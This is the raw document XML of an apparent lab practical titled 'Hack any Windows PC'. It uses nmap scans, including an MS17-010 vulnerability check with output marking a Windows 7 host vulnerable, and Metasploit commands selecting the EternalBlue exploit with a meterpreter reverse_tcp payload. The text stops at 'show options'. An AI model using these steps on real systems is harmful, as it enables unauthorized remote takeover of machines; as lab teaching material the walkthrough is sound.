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BC194" w14:textId="67B1E0FE" w:rsidR="007068C3" w:rsidRPr="00BB07F3" w:rsidRDefault="00BB07F3" w:rsidP="00197E78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B07F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  </w:t>
      </w:r>
      <w:r w:rsidR="00197E78" w:rsidRPr="00BB07F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>HACK ANY WINDOWS PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B1E6DF" w14:textId="77777777" w:rsidR="00197E78" w:rsidRPr="00197E78" w:rsidRDefault="00197E78" w:rsidP="00197E78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00197E78">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">In this practical, I will show you how to Hack any Windows Pc using Metasploit payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F2B9D4" w14:textId="77777777" w:rsidR="00197E78" w:rsidRPr="00197E78" w:rsidRDefault="00197E78" w:rsidP="00197E78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00197E78">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Required Tools &amp; Software's:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CFB210" w14:textId="77777777" w:rsidR="00197E78" w:rsidRPr="00197E78" w:rsidRDefault="00197E78" w:rsidP="00197E78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00197E78">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Kali Linux Running as default OS or in Virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEEE48F" w14:textId="77777777" w:rsidR="00197E78" w:rsidRPr="00197E78" w:rsidRDefault="00197E78" w:rsidP="00197E78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00197E78">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Windows 7 running on same network that we are connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C30623" w14:textId="77777777" w:rsidR="00197E78" w:rsidRPr="00197E78" w:rsidRDefault="00197E78" w:rsidP="00197E78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00197E78">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Metasploit Software. (Pre-Installed in Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595970C8" w14:textId="5CA39529" w:rsidR="00E92BE5" w:rsidRPr="00BB07F3" w:rsidRDefault="00197E78" w:rsidP="004E1BEF">
      <w:r w:rsidRPr="00197E78">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D9BC59" wp14:editId="3ED68B64">
            <wp:extent cx="5731510" cy="4876165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1811250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4A3C" w14:textId="77777777" w:rsidR="004E1BEF" w:rsidRDefault="004E1BEF" w:rsidP="00197E78"/>
    <w:p w14:paraId="232DDADB" w14:textId="24724F08" w:rsidR="004E1BEF" w:rsidRDefault="004B3306" w:rsidP="00197E78">
      <w:r w:rsidRPr="004B3306">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D272704" wp14:editId="3B5B3161">
            <wp:extent cx="5731510" cy="2281555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="10579764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BF45A9-25C8-3315-A598-04D30B57DC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CBF45A9-25C8-3315-A598-04D30B57DC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62"/>
                    <a:stretch/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04D" w14:textId="7DBACF1B" w:rsidR="00197E78" w:rsidRDefault="00B547A0" w:rsidP="00197E78">
      <w:r w:rsidRPr="00B547A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02A82FE1" wp14:editId="646273E1">
            <wp:extent cx="5731510" cy="3936365"/>
            <wp:effectExtent l="0" t="0" r="254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1F64BC8-07DB-58E1-4E77-4A820A1B78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1F64BC8-07DB-58E1-4E77-4A820A1B78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36"/>
                    <a:stretch/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6E84" w14:textId="77DE45E9" w:rsidR="00E92BE5" w:rsidRPr="00BB07F3" w:rsidRDefault="00BE18D5" w:rsidP="007C59C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE18D5">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE18D5">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE18D5">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE18D5">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE18D5">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE18D5">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE18D5">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE18D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A020B">
        <w:t xml:space="preserve">(windows 7 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A020B">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A020B">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556029DB" w14:textId="5E731AE4" w:rsidR="009F15FF" w:rsidRDefault="009F15FF" w:rsidP="007C59C1">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300DBE43" w14:textId="1FF97A4B" w:rsidR="00E07F1C" w:rsidRDefault="00E07F1C" w:rsidP="00E07F1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07F1C">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07F1C">
        <w:t xml:space="preserve"> -p 445 --script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E07F1C">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07F1C">
        <w:t xml:space="preserve">-protocols </w:t>
      </w:r>
      <w:r w:rsidR="00DD1D91">
        <w:t xml:space="preserve">(windows 7 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD1D91">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD1D91">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7DE8A" w14:textId="252CF22F" w:rsidR="00E92BE5" w:rsidRPr="00E07F1C" w:rsidRDefault="00E92BE5" w:rsidP="00E07F1C">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1435ED" w14:textId="77777777" w:rsidR="00E07F1C" w:rsidRPr="00E07F1C" w:rsidRDefault="00E07F1C" w:rsidP="00E07F1C"/>
    <w:p w14:paraId="403D8D02" w14:textId="3DA08DE6" w:rsidR="007C59C1" w:rsidRDefault="00CD07A3" w:rsidP="007C59C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53708F1D" wp14:editId="38CC1712">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12788594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947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DBF9" w14:textId="0BB27306" w:rsidR="00A6778E" w:rsidRPr="00F9337E" w:rsidRDefault="00A6778E" w:rsidP="00A6778E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6778E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6778E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A6778E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A6778E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 445 -script=smb-vuln-ms17-010 </w:t>
      </w:r>
      <w:r w:rsidR="00967CE4">
        <w:t xml:space="preserve">(windows 7 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00967CE4">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00967CE4">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6778E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D36FFCB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>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Starting Nmap 7.94SVN </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>( https://nmap.org</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) at 2024-11-17 12:29 EST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FFF9AB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Nmap scan report for 192.168.18.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1419F6C1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Host is up (0.0026s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431C1797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PORT    STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C1CEA7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445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121AB7E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Host script results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BCDDEA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 xml:space="preserve">| smb-vuln-ms17-010: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9A0504" w14:textId="77777777" w:rsidR="0076270B" w:rsidRPr="0076270B" w:rsidRDefault="0076270B" w:rsidP="007D7968">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>|   VULNERABLE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BF4E55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|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602CF196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|     State: VULNERABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CF81C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 xml:space="preserve">|     IDs:  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CVE:CVE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3907243D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|     Risk factor: HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6205F85F" w14:textId="77777777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|       A critical remote code execution vulnerability exists in Microsoft SMBv1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAFA93C" w14:textId="47C68C64" w:rsidR="0076270B" w:rsidRPr="0076270B" w:rsidRDefault="0076270B" w:rsidP="007D7968">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0076270B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>|        servers (ms17-010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D68CC4" w14:textId="4853B656" w:rsidR="00EF384B" w:rsidRPr="007C59C1" w:rsidRDefault="00EF384B" w:rsidP="00CD07A3">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA58734" w14:textId="5A848E6B" w:rsidR="00CD07A3" w:rsidRPr="00B547A0" w:rsidRDefault="00C527DC" w:rsidP="007C59C1">
      <w:r>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A885CC" w14:textId="63D8EB90" w:rsidR="00B547A0" w:rsidRDefault="00B547A0" w:rsidP="00197E78">
      <w:r w:rsidRPr="00B547A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13D1E103" wp14:editId="13A0CFCF">
            <wp:extent cx="5731510" cy="1283335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81C7A26-E8CC-7618-1401-1D1B74EB71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81C7A26-E8CC-7618-1401-1D1B74EB71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394"/>
                    <a:stretch/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E006" w14:textId="77BB180E" w:rsidR="00B547A0" w:rsidRDefault="00B547A0" w:rsidP="00197E78">
      <w:r w:rsidRPr="00B547A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F96C440" wp14:editId="41EFAA20">
            <wp:extent cx="5731510" cy="2818765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="63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71E0DAB-D697-A6D9-CAF6-5A5A2B33EE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71E0DAB-D697-A6D9-CAF6-5A5A2B33EE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DFA5" w14:textId="77777777" w:rsidR="00624048" w:rsidRPr="007C59C1" w:rsidRDefault="00624048" w:rsidP="00624048">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C59C1">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">[Screenshot above </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C59C1">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>command  x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C59C1">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65608E9C" w14:textId="4E86E319" w:rsidR="00624048" w:rsidRDefault="00624048" w:rsidP="00197E78"/>
    <w:p w14:paraId="5C1E3EB6" w14:textId="7237319A" w:rsidR="00B547A0" w:rsidRDefault="006C3F3E" w:rsidP="00197E78">
      <w:r w:rsidRPr="006C3F3E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A76CB1E" wp14:editId="027FCCE0">
            <wp:extent cx="5731510" cy="1639570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="475059685" name="Picture 3" descr="A white sheet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4B5B436-1E6F-BC46-F044-463999D5DD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9685" name="Picture 3" descr="A white sheet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E4B5B436-1E6F-BC46-F044-463999D5DD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9F9C" w14:textId="4F058637" w:rsidR="006C3F3E" w:rsidRDefault="006C3F3E" w:rsidP="006C3F3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3F3E">
        <w:t xml:space="preserve">msf6 &gt; </w:t>
      </w:r>
      <w:r w:rsidR="003F60F1">
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F60F1">
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A0BD557" w14:textId="2383870A" w:rsidR="006D614B" w:rsidRPr="003F60F1" w:rsidRDefault="006D614B" w:rsidP="003F60F1">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D614B">
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22EA1E4A" wp14:editId="08098EF6">
            <wp:extent cx="5731510" cy="3581746"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12" name="Picture 12" descr="C:\Users\Personal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-16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ersonal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-16-3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0E52" w14:textId="77777777" w:rsidR="00DE2CF3" w:rsidRPr="00DE2CF3" w:rsidRDefault="00DE2CF3" w:rsidP="00DE2CF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t>msf6 &gt; use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA31AF" w14:textId="77777777" w:rsidR="00DE2CF3" w:rsidRPr="00DE2CF3" w:rsidRDefault="00DE2CF3" w:rsidP="009106AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t>[*] No payload configured, defaulting to windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D025546" w14:textId="123007F3" w:rsidR="003F60F1" w:rsidRDefault="00DE2CF3" w:rsidP="009106AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t>msf6 exploit(windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:t xml:space="preserve">/ms17_010_eternalblue) &gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF51668" w14:textId="468EB139" w:rsidR="00DE2CF3" w:rsidRDefault="00DE2CF3" w:rsidP="00DE2CF3">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">[Screenshot above </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>command  x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B31BF08" w14:textId="13981FE3" w:rsidR="006D614B" w:rsidRPr="00DE2CF3" w:rsidRDefault="006D614B" w:rsidP="00DE2CF3">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D614B">
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78ED37A5" wp14:editId="4D9C988E">
            <wp:extent cx="5731510" cy="3581746"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="C:\Users\Personal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-20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ersonal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-20-1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540" w14:textId="77777777" w:rsidR="00DE2CF3" w:rsidRDefault="00DE2CF3" w:rsidP="00DE2CF3"/>
    <w:p w14:paraId="1B6E019B" w14:textId="77777777" w:rsidR="009A084F" w:rsidRPr="009A084F" w:rsidRDefault="009A084F" w:rsidP="009A084F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009A084F">
        <w:lastRenderedPageBreak/>
        <w:t>msf6 exploit(windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A084F">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A084F">
        <w:t xml:space="preserve">/ms17_010_eternalblue) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A084F">
        <w:t>&gt;  show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A084F">
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471CE75A" w14:textId="77777777" w:rsidR="009A084F" w:rsidRPr="006C3F3E" w:rsidRDefault="009A084F" w:rsidP="00DE2CF3"/>
    <w:p w14:paraId="334E1CF4" w14:textId="597FC489" w:rsidR="006C3F3E" w:rsidRDefault="006C3F3E" w:rsidP="00197E78">
      <w:r w:rsidRPr="006C3F3E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15A38E6B" wp14:editId="466A302F">
            <wp:extent cx="5731510" cy="1795145"/>
            <wp:effectExtent l="0" t="0" r="254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2A3EAB2-E7C6-C6F2-F0F1-FF81B2064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2A3EAB2-E7C6-C6F2-F0F1-FF81B20646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5A39" w14:textId="076BB793" w:rsidR="00463E38" w:rsidRDefault="00463E38" w:rsidP="00463E38">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">[Screenshot above </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>command  x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE2CF3">
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6E2F95" w14:textId="05613885" w:rsidR="006D614B" w:rsidRPr="00DE2CF3" w:rsidRDefault="006D614B" w:rsidP="00463E38">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D614B">
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43D4BFF7" wp14:editId="681A37C5">
            <wp:extent cx="5731510" cy="3581746"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14" name="Picture 14" descr="C:\Users\Personal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-20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ersonal\OneDrive\Desktop\kali-linux-2025.4-vmware-amd64-2026-04-21-10-20-5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7CC5" w14:textId="77777777" w:rsidR="00463E38" w:rsidRDefault="00463E38" w:rsidP="00197E78"/>
